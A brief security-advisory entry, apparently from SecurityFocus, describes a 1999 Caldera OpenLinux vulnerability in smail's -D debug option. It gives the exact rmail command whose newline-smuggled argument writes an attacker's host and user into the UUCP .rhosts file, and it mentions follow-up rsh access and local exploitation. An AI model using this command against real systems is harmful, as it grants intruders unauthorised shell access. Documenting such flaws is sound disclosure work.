Caldera OpenLinux 'smail -D' Command Vulnerability

According to the Caldera advisory (CSSA-1999:001.0), smail's -D option names the debug file to use. If an attacker submits a UUCP job containing the following rmail invocation:

rmail -N -D /usr/lib/uucp/.rhosts -oMs "joe\nhostname user\n" uucp

where '\n' is a newline, and 'hostname' and 'user' specify the attacking host and user, then 'smail' will happily append the following to the UUCP '.rhosts' file:

rmail: Debugging started: pid=25919

write_log:Received FROM:uucp HOST:joe
hostname user
... some more lines ...

The attacker can then 'rsh' into the target host and try to exploit the UUCP account (e.g. by replacing the 'uux' binary).

Note that this hole is also exploitable locally; all you have to do is call 'uux rmail ....' to make it work.


Privacy Statement
Copyright 2010, SecurityFocus